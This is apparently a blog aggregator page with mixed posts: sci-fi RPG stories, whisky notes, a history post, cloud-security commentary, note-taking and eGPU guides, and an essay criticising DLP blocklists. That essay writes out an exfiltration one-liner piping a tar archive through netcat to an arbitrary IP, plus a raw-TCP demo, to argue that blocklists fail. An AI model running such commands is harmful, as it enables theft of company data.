Infosec Press

Reader

Read the latest posts from Infosec Press.

from Sirius

In this short story, a pilgrim from another world warns a human of what is to come. Image of the gardens of an extraterrestrial civilization. We are not alone in the universe, though vast distances separate the worlds inhabited by life that organizes itself into technologically developed societies, including in our own galaxy.

Moreover, distance is not all that separates us; there is also timing. Imagine how many developed societies already existed before ours and have gone extinct – whether in a self-inflicted, reckless way, as in the human case, subjugated by social classes that impose a capitalist system which destroys the natural environment and slowly condemns their existence, or as the result of natural catastrophe or war. And imagine how many societies will yet develop, millions or billions of years after our civilizations no longer exist.

Questions of distance and timing, however, are not a great problem for civilizations more advanced than ours. Even we, the Gunideans, have developed to the point of fully harnessing our planet's energy, and we have begun to find ways for our lives, or at least our consciousnesses, to last long enough to keep pace with the lifetime of our galaxy.

I believe an even greater problem is the clash between the differing ways and worldviews of developed civilizations, which are capable of exterminating one another in eventual conflicts or wars.

Developed civilizations are, of course, not homogeneous. On Earth there are only humans, a single technological species, which wages imperialist wars over resources, trade routes and power, so that it can grow its capitalist economies.

On Gunes there is not just one species, but six. It is as if Homo sapiens still lived alongside other, now-extinct human species, such as the Neanderthals.

Among the Gunidean races, the Luminos and the Nychtar stand out in technology and power, coexisting under an armistice sealed more than three thousand years ago.

Just as on Earth, where states with nuclear technology do not go to war directly because of mutually assured destruction, the conflicts on Gunes have ceased, and the planet has become a grand sanctuary whose environment is diligently preserved, with well-defined habitation zones for the six races, governed by a council in which all of them take part.

We have already overcome challenges such as hunger, poverty, the exploitation of Gunidean labor, the oppression of sentient animals, and other forms of abuse among Gunideans, but a cold war persists, extending into a space race.

Because of the Luminos, my people, from whom I am an outcast, many civilizations are under threat, since our culture defines us as the bearers of light and universal reason.

The Luminos believe they are predestined to govern the cosmos through reason, truth and justice. And what is truth, or justice? I do not know! Unless we are speaking of particular, relative notions of what I happen to think is just or true. But the Luminos, on the whole, are absolutely certain that they possess these virtues and that they will soon be free of the “shackles of darkness” imposed by the Nychta tyranny. War will return, sooner or later.

The Luminos arose from nomadic peoples in the deserts of Gunes, when the skies were already open. Though never as strong as the Nychtar, an older race forged in war, they have always been extremely skilled fighters, diligent, excellent astronomers and fervent religious philosophers, believers in the divinity of radiance, which according to our sacred writings is personified in our star: Radiante.

With the end of the wars on Gunes and the signing of the armistice, the Luminos devoted themselves to surpassing the more sophisticated technologies of the Nychtar, the peoples of darkness, who have already mastered antimatter. They extract resources from other planets in the system and have raised a space city that feeds directly on the energy of our star.

The Luminos are led by Akin and others of our race known as the Radiants, regarded as celestial beings, like angels, for their experience and cultivation of Lumino virtues. They are held to be the most eminent among the Luminos, and they created a universe that houses their consciousnesses.

This universe, it should be noted, is a virtual world whose architecture was conceived and designed by Akin and those angels, comprising multiple planes, or circles, of existence.

Through the development of Soul technology – a gem built on quantum computing – the Luminos can preserve their consciousness and memories indefinitely, migrating their mind, or “spirit”, into extremely resilient and powerful physical bodies built with our biotechnology. The Soul also allows their consciousnesses to live in and inhabit the Radiance, the Luminos' virtual universe.

In the Radiance, Luminos can live many lives across the planes of existence designed by Akin. Some Luminos live entirely in the Radiance and have never needed to return to the real world. Their consciousnesses are immortal, stored in their Souls. Some live dozens of lives, their spirits tested by Akin and the Radiants, cultivating what they believe to be the desirable virtues of consciousness. There is an infernal plane meant to bring pain and suffering to those deemed sinners, and lighter, happier planes for the allegedly pure of heart or virtuous. By overcoming the trials of their existences within the Radiance, the most virtuous Luminos manage to keep, or even recover, the memories of their past lives, becoming not only immortal souls but fully conscious of their lives inside the Radiance and outside it (should they live incarnated in Lumino bodies in the real world).

I know this because for a long time I was one of Akin's Radiants. Before becoming the Black Star, I lived for more than two thousand years in the Radiance and became one of the architects of that false world, which I now despise. Naturally, everything I lived through and know is of the utmost importance to Akin.

Although I managed to block the transmission of my consciousness to the Radiance, if they seize my Soul, which resides in my physical body, Akin will be able to access my experiences and the knowledge I gained inside and outside his domain. He could also erase my memories, ending my existence, or simply torture me eternally on an infernal plane.

I am the only Lumino who can truly die, and nothing makes me happier! In these last few centuries I have felt a freedom I never had before, with all the problems, challenges and brief joys it brings.

When I decided to flee the Radiance, I already knew the plans of Akin and my fellow Radiants. We Luminos had discovered a civilization at an early stage of development, one that forged steel, cannons and arquebuses, built ships, and crossed great distances across its oceans to conquer, enslave and kill its own brothers.

They called themselves humans, for they believed they had originated from the earth, and they inhabited a blue planet orbiting a beautiful yellow dwarf star they called the Sun.

As soon as they were discovered, with a way of life so predatory and cruel – reminiscent of the Gunidean-devouring demons that ruled Gunes in the ancient era – Akin and the Radiants drew up a project to deliver them from their mutual destruction and the destruction of their natural environment.

Deemed incapable of governing their own destiny and of honoring the gift of life the divinity had granted them, they were chosen to be the first people to be ruled by the Luminos.

A new radiance began to be designed for their consciousnesses, considered naive, to inhabit, removing them from their earthly existence. It was decreed that humans who rebelled against Lumino rule would be summarily exterminated, while those who accepted the rapture of the people of light would pass through incarnations in the new Radiance, purifying their spirits through the cultivation of the virtues until they became fit to return to their world.

I learned, some years ago, that when humanity gained knowledge of the energy of nuclear fission and actually used it to wipe out thousands of lives, the Luminos decided to move their plan forward. They are on their way. The final Judgment approaches. But you will not be alone.

#RPG #Contos #Fantasia #Ficção #CenárioDeCampanha

 
Read more...

from beverageNotes

This evening is very pleasant and a fine end to a pleasant day. A bit on the warm side, but nowhere near as hot as it has been the past couple of weeks.

Sitting on the patio, I'm having a post-dinner dram of Red Line Elements Amburana Small Batch (https://www.redlinebourbon.com/elements-1). I picked it up for $60 from a local joint. They have several brick and mortar locations, offering a wide variety of whiskies and wine, along with smaller selections of beers, cheeses, and chocolates.

This is my second bottle and I'm a fan. The 103 proof warrants an ice cube or two and requires an “easing in” to get the bouquet—spicy caramel apple pie. That's my summation of the experience. I love it!

There's cinnamon and cloves. Hints of orange.

This offering is non-chill filtered, and having learned more about what that implies, I can pick out how it is not as 'thin' as Irish or Scotch whiskies.

Some neighborhood deer are in my backyard now, checking me out. The doe is chomping on some honeysuckle, which I would love to have eaten to the roots. One of the two fawns keeps lying down, and neither seems very interested in eating. Maybe they're not quite old enough to have been weaned.

With this being my 3rd post, I'm probably not in any danger of creating a run on Red Line Elements Amburana Small Batch, but if you find it—it's limited to a couple of handfuls of states in distribution—and give it a go, please let me know what you think.

 
Read more...

from risibledog

William Pelley posing with dork-ass nazis of the Silver Legion (aka “Silver Shirts”) in Redmond, WA circa 1936.

Lately I keep thinking that it's a little surprising nobody has seized on the opportunity to make a recent flick about William Dudley Pelley. Maybe it's a little too on-the-nose? It might be a challenge to avoid having it scan as didactic / corny, and of course there's always the difficulty of avoiding the induction of dumbass anti-hero sympathy toward him in (maybe especially US) audiences, but the dude really has it all:

  • an anti-communist politics which is inseparable from antisemitism,
  • a narcissistic, moderately successful author & hollywood screenwriter who goes far-right,
  • heaps of proto-new-age woo bullshit,
  • a large-scale street fascist paramilitary organization (which finds particular traction in the Pacific Northwest),
  • a high-profile seditious conspiracy trial & conviction,
  • etc. (etc. etc. etc.)

Anyway, interesting prologue & historical context for a lot of things happening at the moment – and a pretty salient object lesson in the type of ostentatious (nonetheless very dangerous) clown that tends to spearhead any given fascist movement with demagoguery.

Knute Berger did a good little PBS bit on him not so long ago, worth checking out.

Bill Hader is good at wrecking the anti-hero tropes, so...

 
Read more...

from Armamix

I don't really think I need or want to start blogging again, but by all means. Here's a cheap tip to start things off: Test your backups regularly.
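That tip is worth making concrete: a backup you have never restored is not a backup. Below is a minimal, hypothetical Python sketch of an automated restore test; the file names and the tar-based "backup" are stand-ins for whatever your real tooling produces.

```python
import hashlib
import tarfile
import tempfile
from pathlib import Path

def sha256(p: Path) -> str:
    return hashlib.sha256(p.read_bytes()).hexdigest()

def verify_backup(archive: Path, originals: list[Path]) -> bool:
    """Restore the archive to a scratch dir and compare file hashes.

    The point is to do a real restore, not just list the archive contents.
    """
    with tempfile.TemporaryDirectory() as scratch:
        with tarfile.open(archive) as tar:
            tar.extractall(scratch)
        return all(
            sha256(Path(scratch) / p.name) == sha256(p) for p in originals
        )

# Tiny end-to-end check: back up a file, then prove it restores intact.
with tempfile.TemporaryDirectory() as d:
    src = Path(d) / "notes.txt"
    src.write_text("irreplaceable data")
    backup = Path(d) / "backup.tar.gz"
    with tarfile.open(backup, "w:gz") as tar:
        tar.add(src, arcname=src.name)
    print(verify_backup(backup, [src]))  # → True
```

The same shape works for any backup system: restore to a scratch location on a schedule, compare checksums against the live data, and alert when the comparison fails rather than waiting for the day you need the restore.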

 
Read more...

from Sirius

The story of one of the main characters of an RPG setting.

Clouds and stars

This tale is narrated by a character named Zerah Black Sun, considered a traitor to the Luminos, the race of light to which he too belongs. He tells humans about Pantea, his ally and the principal leader against the imperialist designs of his people, the Luminos, who intend to claim the Earth.

The story I tell you is the saga of a woman of the tribe of darkness, born on Numina, a world so distant from this solar system that, even traveling at nearly the speed of light, it would take decades to reach.

Her people were the first among the Gunideans, our species, which bears similarities to humans. According to our mythology, we were believed to have originated from a magical plant called guna. It germinates in the darkened mud of lakes and grows until it reaches and breaks the water's surface, blossoming into the sacred guna flowers.

Our oldest sacred manuscripts say that when the tribe of darkness emerged, the skies could not be seen, for a dense layer of clouds shrouded all of Numina. Pantea's ancestors had to survive in a hostile world ruled by darkness and gloom.

At the beginning of our history the world was also ruled by powerful creatures such as dragons and demons. The Nychtar thus adapted amid constant fighting and the ever-imminent risk of the extermination of their entire population.

The skin and hair of the Nychtar are black as night; their eyes have irises of pale silver. Millennia of struggle made their bodies the most resilient and powerful among the Gunideans.

Nychtar females, who had to adapt to carrying their offspring amid critical fights for survival, developed a capacity for regeneration unmatched by the males, though the males are more robust.

After a long era, the tribe of darkness established a warrior, patriarchal society capable of withstanding and repelling the hostilities of other creatures. This process, however, did not occur without trauma.

Although the females fought alongside the men in the ancestral battles, the men surpassed them in size and strength. The first Nychta emperor, Rinalk, imposed a new social order that subjugated women, consigning them to reproduction and drudgery, claiming it was their “nature”, given their greater capacity to endure pain and their power of bodily regeneration.

There was resistance, of course, but the women were subdued by the strength of the men who followed the First Emperor of Darkness, and the ideals of those warriors were efficiently suppressed by force and by religious, moralistic and pseudoscientific ideologies about the role reserved for the female in the preservation of the species.

Many women were punished, killed and tortured in the process. But although they were relegated to a secondary role in the social order, unlike what happened in the history of the human species, they were not entirely stripped of the right to produce and acquire knowledge about nature.

This is due to the mythic status of astronomy among the women of darkness. It is said that the first Gunidean to observe a celestial body was a Nychta woman named Astrea.

The legends declare that Antarsia, the dragon god of shadows, took pity on the Nychtar women and thinned the mists that covered the world for the first time. Astrea then saw, for the first time, in the night, the enchanting glow of a star – the brightest in Numina's night sky, the one you humans know as Vega.

Through Astrea, Antarsia and the other gods gave her people their greatest mission: to reach the stars and travel through the darkness of the firmament. Astronomy thus became one of the most cherished and venerated bodies of knowledge among the ancestral women of that people.

Millennia passed after the first Nychtar empire. With the end of the age of mists came the Igneos, Geos, Aeros, Hydros and Luminos, Gunideans who established hegemony over the other species across all of Numina, prevailing over the dragons, demons and other races that threatened them.

It was in the era of the battles for Gunidean hegemony that Pantea was born. She descended from both the lineage of the stars and the lineage of darkness, Nychtar peoples descended respectively from the tribes of Astrea and of Rinalk.

Although war was a male domain in her time, she had to learn the craft of combat from an early age, since most of the men of her home city had been exterminated by the legions of the demon empress of the south, Agrat.

Even though it was uncommon at the time for a female to be authorized to lead Nychtar troops, she received permission from the principality of darkness to hold command positions among the troops of the Igneos, strong allies who had elevated their military technology through advanced knowledge of metallurgy.

In the alliance with the Igneos, Pantea distinguished herself by her strength, agility, leadership and intelligence, but above all by her skill in handling and riding animals, which is why she came to lead the alliance's Igneo cavalry.

The bards of her people wrote verses about her empathy with animals and her demon-reaping sword of Igneo steel.

To be continued...

#RPG #Contos #Fantasia #Ficção #CenárioDeCampanha

 
Read more...

from Hyperscale Security

Any week in the security press proves that, generally, most companies and institutions have struggled to implement adequate or even basic security protections, despite best intentions and effort. While the move to the cloud has its own risks, whether IaaS, PaaS or SaaS, it also provides the opportunity to outsource many security responsibilities to a cloud provider. The cloud platforms have many security and resiliency features baked in, and it can reasonably be argued that cloud providers can bring more resources and talent to bear and, through economies of scale, do a better job than their customers can.

Aside from the agility and flexibility of cloud solutions, for each organization individually a move to the cloud can be a real net benefit to security and resiliency, compared to running critical systems in-house.

Decentralized Inadequacy vs Centralized Competence

To take just one example: organizations notoriously struggle to keep systems up to date, with new vulnerabilities being disclosed all the time. Rather than managing that yourself, using an always-at-the-latest-version SaaS solution is a real security benefit, for each organization separately but also in aggregate.

We have to recognize, though, that there are not that many cloud providers that we all rely on. The companies listed in the Cloud Wars Top 10 – and full disclosure, I work for one – increasingly run the critical workloads that we all rely on as customers, employees and citizens. That means if anything goes significantly wrong the impact may be widespread.

We are moving from a situation where the likelihood of an individual failure in confidentiality, integrity or availability (CIA) is higher but the impact is contained, to one where the likelihood is lower, but the impact could be catastrophic.

The Colonial Pipeline Ransomware Attack led to the shutdown of all pipeline operations by the company and caused widespread fuel shortages across the US East Coast. What is often forgotten is that the ransomware affected the billing infrastructure, not the operational systems. With such administrative systems increasingly moving to the cloud, a major incident at a cloud provider affecting thousands of companies all at the same time would have devastating cascading effects throughout the global economy and the functioning of society.

Cloud as Critical Infrastructure

I think it is reasonable therefore to see cloud providers as critical infrastructure. The IT Sector in general already is designated as such, but these designations don't yet specifically focus on the unique and growing role of cloud providers within that sector as the providers of services to everybody else.

Cloud security has so far mostly focused on the consumer side of the Shared Responsibility model: security in-the-cloud. Cloud providers have also started to recognize that they have a responsibility to help their customers run more securely. More recently, security issues of-the-cloud, such as those recorded in the Cloud Vulnerability Database, have received more attention, showing that the cloud providers aren't perfect. A recent incident prompted a US Senator to criticize one of them for “negligent cybersecurity practices”.

It is time that cloud providers are held to a greater level of scrutiny on their own internal operations. If failure can have significant impact on the economy, the functioning of society, and even lives, we should expect similar oversight and consequences as in Utilities, Finance or Healthcare.

 
Read more...

from beverageNotes

Revisiting the Four Roses, while listening in and occasionally watching the USWNT play The Netherlands in the Women's World Cup. Go USA! (They are down by one at the half, as I write this.)

This will be a bottle kill. A more generous pour than I usually go for, but it was nearly empty.

My cold is mostly gone, but the flavors haven't changed much. I'm detecting a hint of anise or licorice on the nose—maybe it's the astringency. There's a hint of it in the back third of the sip, as well.

I've some chocolate-covered Bing cherries to go with the whisky, and they complement it well. Having a sip just after the cherries accentuates some pipe tobacco and sweetness.

Overall, I like the whisky and would certainly have some if offered or if I received a bottle as a gift. It's not the best I've ever had. This is about $60/bottle, so I'd prefer picking up a Penelope Toasted, an Eagle Rare, or even a Kirkland BiB.

 
Read more...

from serialcomplainer

Everyone who works or has worked in a medium/big/large/huge/... company has, I am sure, encountered plenty of occasions where the security measures put in place by the company were extremely annoying: a mix of intentional slow-downs, red tape, bureaucracy and ritual.

This is no news, as a lot of regulations impose compliance with a number of frameworks, which often prescribe a bunch of security measures to implement. Security means controls, and controls can be implemented well, or can be... just implemented. The problem with compliance is that you often find yourself walking a fine line between useful security measures that mitigate risk and protect people (and the organization), and complete bullshit security theater that essentially exists to tick a box during an audit. The more annoying the latter is to the end user (the unlucky working class who just want to get their job done to earn a salary, to have money to spend in their free time, to forget about work), the more “security” it appears to provide.

Another problem is that complying with many different regulations takes a lot of policies. A LOT. Each policy has tons of sections, subsections, sub-subsections, and so on. These are often accepted/reviewed once a year, in that beautiful process in which hundreds or thousands of employees sign off on company policies that they barely read and, when they do read them, barely understand (because of how the policies are written, not because of the employees), much the same way we all accept the EULA when signing up for Facebook or whatever cool new social network young people use.

Either way, I digress. What is the problem with many policies? Well, there are a few:

  • Maintenance is hard. Reviewing policies is one of the most boring jobs ever, and when you have tons of them, keeping them all up-to-date enough to stay relevant is a challenge.
  • Even harder is maintaining a framework of policies. Policies need to all go in the same direction; they need to live in harmony with each other and should not contradict each other.

Enter Workstation Security

One of the largest battlefields on which compliance, security theater, actual security, marketing from security companies, the pleasure of making people miserable, and other forces meet is the security of employee workstations.

To be honest, the last year has seen a rise in attacks involving the compromise of engineers' workstations, on top of the usual phishing attacks (which have been “on the rise” every year for the last 10 years, according to prestigious security publications), so all of this is not completely unfounded.

Anyway, usually every company has an “Acceptable Use Policy” (AUP) which states what you can and cannot do with your company device(s). This includes things like watching porn, gambling, playing games but also things like installing new software. Clearly the situation gets complicated when we are talking about workstations for engineers and tech workers in general: they generally need a lot of tools to get their job done or to do it in a more efficient way. However, this often conflicts with the common requirements of getting approval for every software installed.

Besides the AUP, there is another term that companies (mostly the ones that sell products to “prevent” it) love: DLP, Data Loss Prevention. This essentially means preventing you (the employee) from exfiltrating the company's proprietary data outside the company. Concretely, this translates into things like blocking USB drives on workstations and blocking certain sites (personal email, storage sites, etc.).

DLP is security theater. Here, I said it. In most companies DLP translates into a bunch of annoying rules that make the life of people working more annoying, without solving any problem at all, against even the slightly motivated and capable malicious user.

Let's not just rant, though; let's make concrete examples. One of the most important DLP areas is the network. To prevent you (the bad employee) from going to Google Drive and uploading a beautiful zip with all the company data, organizations usually install a proxy in the corporate network. Alternatively, for those working remotely (but not only, of course), the company might enforce a VPN solution with DLP integrated. What this means is that every single network packet an employee sends first needs to pass through this proxy, where it gets decrypted, analyzed, filtered and then sent on to its destination.

This technique also inspects HTTPS (TLS) traffic, since the company installs by default on every workstation a CA certificate issued by the VPN provider, which is trusted for everything. In other words, if you go to https://mysite.org from your company workstation and inspect the certificate in the browser, you will see that it was actually issued by your VPN provider.

So far, this makes sense, right? It is reasonable that on a company workstation you have no expectation of privacy (which is another reason why you should NEVER, EVER use your work devices for anything other than work), and that traffic is inspected. Unfortunately, the “controls” usually don't stop here. For a man with a big hammer, everything looks like a nail. Once you pay big money for this kind of product, you want to start using all the beautiful features it offers, and the first – I guarantee you – is the category block. We are not talking about porn, gambling, etc.; we are talking about calendars, email, and the like.

Once this solution is in place, it's common to see rules like “only [whatever email provider your company uses, say Gmail] is allowed”. Then, if you try to go to mail.proton.me, you get a big error message telling you the page is blocked because it's an email application. Same if you go to outlook.com (if for some reason you chose to keep your email there), and so on. The same applies to calendars, storage applications, etc.

What is the problem here? The problem is that this is bullshit. Not in the sense that it has no rationale, but in the sense that it is pretty much like trying to empty the sea with a bucket. Its only achievement is that Sarah in accounting will have more trouble organizing her life, because she can't access her work calendar from her personal devices (of course!) nor her personal calendar from her work device. Or that John from marketing will need to jump through 25 hoops to access a site he needs to share data with a customer (who doesn't happen to use the same system as his company), usually by requesting some manual, temporary whitelist entry, with lots of approvals and time wasted. That's pretty much the only achievement, because there is just no way, NO WAY, that whatever pricey solution you are buying actually blocks all email, storage, calendar, etc. applications on earth (or rather, on the Internet). It simply will not happen. Anybody can run any of a huge number of open-source or even custom tools to do essentially whatever they want. You can host a pastebin service under your personal domain, you can access your personal Gitea instance, and a solution that works by matching the domain alone against a list – especially a blocklist – is going to be extremely ineffective. You could achieve this only via an allow-list, but good luck figuring out the list of all the websites everyone in the company needs to access.
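To make the futility concrete, here's a toy sketch (hypothetical Python; the domains are taken from the examples above) of what a domain blocklist fundamentally does, and why any self-hosted service walks right past it:

```python
# A naive domain blocklist of the kind a web filter maintains.
BLOCKED = {"mail.proton.me", "outlook.com", "drive.google.com"}

def is_blocked(host: str) -> bool:
    """Block exact matches and subdomains of listed domains."""
    return host in BLOCKED or any(host.endswith("." + d) for d in BLOCKED)

print(is_blocked("outlook.com"))       # → True: the well-known provider is caught
print(is_blocked("news.kitchen.cat"))  # → False: a self-hosted upload service sails through
```

However clever the matching gets (subdomains, wildcards, category feeds), the logic is still membership in a finite list, while the set of domains that can host an upload form is effectively infinite.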

In fact, usually there is always someone within a company that knows “something that works”, which they use to do their job better, and which technically violates a huge number of policies, but that “since it's not blocked” automatically feels like allowed (which makes sense, to some extent).

So here there are only 2 scenarios that matter:

  • Your super expensive network DLP-blockchain-AI-web3 technology can block network traffic which contains suspicious sensitive data.
  • Your super expensive network DLP-blockchain-AI-web3 technology cannot block network traffic which contains suspicious sensitive data.

If your solution falls into the first scenario: good job! You have a technical control that works and scales. At this point there is no need to block any site for anybody in the company anymore, because if Sarah from accounting decided one day not to use her calendar to remember her karate lesson, but to exfiltrate company data, this holy grail of DLP would catch it and block it. It's unclear how such a solution would handle things like code (which you will reasonably sometimes paste online for searches) or credit card data (when you are making a legitimate purchase with your card, not exfiltrating card numbers), but I will leave that to the – I am sure – extremely expensive solutions.

If your solution falls into the second scenario, then you have no technical control. There is absolutely nothing you can do to prevent a user from running something like tar cz . | nc IP port and sending whatever data she wants to whatever IP she controls. You also can't do anything if she can access a file upload service hosted at https://news.kitchen.cat, which likely won't be in any list. Nor can you do anything about the millions of other ways to exfiltrate data that bypass a simple list of domains. If you are in this situation, what benefit does blocking a negligible part of the internet give you? The only benefit is preventing people from making mistakes, like accidentally sending an email from their personal account instead of their work one. Is that kind of scenario worth the nuisance to all the users for everything that is blocked? Maybe it is, maybe it isn't, but that is essentially what the decision should be based on. If someone starts citing the DLP risk of accessing your personal email, you know that's bullshit. A malicious insider will find another way, while the well-meaning users will just obey the rules and get annoyed in the process.
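To see why the second scenario is a lost cause at the network layer, here's a self-contained toy (Python stdlib only, with a localhost listener standing in for the attacker's server): the “exfiltration” is a raw TCP connection to a bare IP, so a filter that matches hostnames against a list never gets a hostname to match.

```python
import socket
import threading

# Toy "attacker-controlled" listener; in real life this is any box on the internet.
received = []
srv = socket.socket()
srv.bind(("127.0.0.1", 0))   # the OS picks a free port
srv.listen(1)
port = srv.getsockname()[1]

def collect():
    conn, _ = srv.accept()
    data = b""
    while chunk := conn.recv(4096):
        data += chunk
    received.append(data)
    conn.close()

t = threading.Thread(target=collect)
t.start()

# The "exfiltration": a raw TCP connection to a bare IP. No hostname lookup,
# no HTTP, nothing for a domain-based blocklist to match against.
client = socket.create_connection(("127.0.0.1", port))
client.sendall(b"the entire quarterly report")
client.close()
t.join()
srv.close()
print(received[0].decode())  # → the entire quarterly report
```

A content-inspecting proxy in the first scenario could in principle flag the payload itself; a domain list in the second scenario is simply blind to this traffic.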

A small parenthesis is due at this point. Every security control has gaps; it's very rare, if not impossible, for anything to be 100% effective. The problem is that in this context we are not talking about a bypass of an otherwise solid control, but about a control that covers only a few of the ways around it. The efficacy is so low that it's like claiming to have restricted access to a field by putting a door in the middle of it: you didn't help a little, you wasted the wood.

Whichever scenario your solution falls into, you need to realize that as a company your main control is administrative: a policy that states that you can't share the data, and that if you do, you will have legal trouble and get fired. Of course this will not prevent anything, but it's basically all you've got. Even the most sophisticated solution won't prevent anybody from taking pictures of their screen and OCRing the data at scale, so it's a lost battle anyway; you might as well not annoy the users in the process.

The Virtualization Issue

When talking about DLP, and workstation security in general, another topic is virtualization. Usually the organization requires running a bunch of tools on each workstation: agents that monitor files, processes and the network (like the one discussed before). Obviously, if you decide to run a VM on your workstation, all those tools and agents will not be present inside it, and therefore there is a security risk and a DLP risk.

The security risk is that your VM can be compromised and potentially infect your workstation as well (hypervisor vulnerabilities are rare, but they exist). The DLP risk is that...you guessed it, the agents we talked about before are not present inside the VM. So you could, for example, be accessing whatever site you want (this mostly applies to people working remotely, not sitting in the corporate network, where the filtering can happen outside the machine).

For these reasons, the AUP sometimes forbids the use of VMs. This is where the beauty of the bureaucracy comes into play: many new companies (especially the hip and techie ones) are now using Apple devices (Macs) as their workstations, managed with tools like Jamf and similar, replacing the very common Windows or (among techies) Linux workstations.

Unfortunately, modern development is also extremely tied to containers, and an engineer who can't use Docker locally nowadays is going to initiate a mutiny. For this reason, Docker usage is generally allowed and necessary. The beautiful part is that on a Mac, Docker Desktop runs containers inside a Linux VM – one configured by default in a way that is less isolated than a regular VM would be (unless explicitly hardened). I would like to conduct a survey of how many Mac shops ban VMs but allow Docker, because that's hilarious. If you want to run a VM with host-only networking, in full isolation, to use some tool that you are not allowed to install, you can't. But if you want to run any Docker image you want, with similar (let's not say worse) isolation, you can.

The policy says so.

 
Read more...

from beverageNotes

I'm finally on the other side of a cold. A couple of days were no good. Minor coughing today and a little sinus drainage, but most certainly on the mend. I wish for a drink, while a pizza is in the oven.

I have a dram of Four Roses Small Batch Select. It's non-chill filtered and 104 proof. There is a wee string on the label, 331SFA2, which could be a lot identifier. (The 'S' could be a '5'. I needed more light to see for sure, but I'm not bothered enough to go find the needed lumens.)

I won the bottle in a bourbon raffle. Bottled lightning! (The Weller's Antique 107 was a pleasant discovery and will be another post.)

Without ice, the first sip is a bit harsh and hot. I usually add an ice cube to these higher proofs. I smell some cinnamon and fruit, maybe pear? Some caramel, too.

The heat hits at different places at different times through the sip. It hits the back of the palate and works its way forward. I taste some caramel and cinnamon.

I've been to several whisky tastings, and during one with reps from Penelope, I learned that non-chill filtering leaves behind some elements in a whisky that chill filtering removes. It changes the mouthfeel. The feel on this one starts smooth and slightly more viscous than other spirits. I then feel velvet, and the sip slips into a slightly rougher cloth.

Continuing on, I also taste butter. I'm reminded of Kerry Gold. I can still pick out some cinnamon, but there are other spices I can't quite put a finger on. Not quite pepper. I feel compelled to say cardamom, but I don't think that's right either.

Perhaps the next dram on another day.

 
Read more...

from risibledog

Recently I've been finding the combination of obsidian & the omnivore plugin to be quite a useful way of maintaining a database of info from articles (etc)!

Once you've got the plugin installed in your vault (you can also find it in Obsidian's “Community plugins” browser), you can edit the Article Template as you see fit.

I'm sure there are smoother ways of setting this up, but my template currently looks like this:

```
#Omnivore 
# {{{title}}}

[Read on Omnivore]({{{omnivoreUrl}}})
url:: [link]({{{originalUrl}}})

{{#highlights.length}}
<!--
## Highlights

{{#highlights}}
- hl:: >{{{text}}} {{#note}}^[*{{{note}}}*]{{/note}}
 {{#labels}} #{{name}} {{/labels}} 

{{/highlights}}
-->
{{/highlights.length}}

---
{{{content}}}
```

I have found that it works great with the dataview plugin. I make a new markdown file to serve as an index using this code block:

```dataview
table without id
	list(file.name, url) as "article", list(date_published, author, hl) as "info & excerpts"
from #Omnivore 
where date_published 
sort date_published desc, date_saved desc
```

This creates a table with a list of the articles sorted in reverse chronological order (ie. the most recent one is at the top), and includes any excerpts which you have highlighted in Omnivore.

It ends up looking like this:

I also edited the Article Template above so that any annotations I add to a highlight can be displayed as a footnote beneath the excerpt, like this:

Some of the articles you save will inevitably not have properly formatted date_published info — those are currently excluded from the above code block. I put another code block beneath that one which looks like this:

```dataview
table without id
	list(file.name, url) as "article", list(date_published, author, hl) as "info & excerpts"
from #Omnivore 
where date_published = null
sort date_published desc, date_saved desc
```

Omnivore also has an “edit info” option for each article saved, so if you'd like to move an article without date_published info into its proper spot in the table which is sorted by date, you can open it in a browser and edit the article's date info. (This date-editing option currently appears to only be available in a web browser, not on the mobile app.)

You can also make more specialized lists of this sort by using Omnivore's “tags” feature and editing the line so it reads from #Omnivore and #[NewTag]. I have also found that Omnivore supports nested tags, which can help narrow or broaden the specificity of various index tables :)


P.S. – if you want quick & easy access to the markdown articles via these index files, just remove the snippet of text which says without id from the code block. That will create an extra column which is a direct link to the markdown file, like this:

 
Read more...

from Kevin Neely's Security Notes

Finishing the POC

I ended part one with a working configuration, so I proceeded to test some scenarios to make sure things were working correctly. For the most part, I connected the keyboard and mouse to the NUC through an old USB hub and connected the Ethernet cable directly to the NUC. The Thunderbolt cable connects the NUC to the #eGPU, and the monitor is connected directly to the Nvidia card. As my testing progressed over the next couple of days, I was mostly happy with the results, but I also ran into a number of quirks and one really unlikely hardware malfunction.

My (Eventual) Build

I paired the Razer Core X Chroma with a recent (late 2020) Intel NUC. I chose this enclosure because it had great compatibility results in most of the articles I was reading, and I liked the USB hub and ethernet port in the back of the device. In retrospect, I probably would have been better off with the plain Razer Core X. The hub’s functionality has been flaky in my experience, only sometimes working with the Ubuntu NUC.


Testing and Troubleshooting

NUC & eGPU experience

I encountered a few quirks during the proof-of-concept phase. For whatever reason, the NUC does not fully recognize the eGPU on every startup. This manifests in the two ways described below.

No login screen after boot

Sometimes, the display would update only as far as the startup messages, ending with checking the volume inodes. Moving the HDMI cable from the eGPU enclosure to the NUC itself showed the login screen once, but most often it was impossible to log in locally. I could either SSH in and reboot, or just long-press the power button and turn it back on.

System not actually using the GPU

The most common problem was similar to the above: sometimes the system would start up, but immediately upon using the GUI, I could feel that something wasn’t right. The password echo dots took a fraction of a second too long to appear. Dragging windows around was a choppy experience. Even though nvidia-smi showed the card as recognized, it clearly was not being used, as no processes had been assigned VRAM.
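The “recognized but unused” state is easy to script as a health check. This is a sketch I'm adding, not part of the original setup, and the 100 MiB threshold is a guess: a healthy desktop session normally has some VRAM allocated, while the broken state shows essentially none. The parsing is split into its own function so it can be sanity-checked without a GPU.

```python
import subprocess

def gpu_memory_used_mib(query_output: str) -> int:
    """Sum the per-GPU values from the output of
    nvidia-smi --query-gpu=memory.used --format=csv,noheader,nounits
    (one integer per GPU, in MiB)."""
    return sum(int(line) for line in query_output.split() if line.strip())

def desktop_is_on_gpu(threshold_mib: int = 100) -> bool:
    """Rough heuristic: if almost no VRAM is allocated, the desktop is
    probably rendering on the CPU and a reboot is in order."""
    out = subprocess.run(
        ["nvidia-smi", "--query-gpu=memory.used",
         "--format=csv,noheader,nounits"],
        capture_output=True, text=True, check=True,
    ).stdout
    return gpu_memory_used_mib(out) > threshold_mib

# if not desktop_is_on_gpu(): time to reboot (again)
```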

Every single time, a reboot fixed this issue. The way to prevent it is to leave the eGPU enclosure connected and powered on overnight. However, the enclosure’s fan then runs continuously and the lighting glows, which seems like a waste.

NUC power switch

Completely unrelated to the actual configuration and testing, but impacting the POC nonetheless was the power switch on my NUC going out. After a frustrating day of testing, I set everything aside -even unplugging all the cables- to give myself a break. Coming back the next morning with some fresh ideas, the NUC wouldn’t power on. I could see that it was receiving power (there’s an internal LED), but pressing the button did nothing.

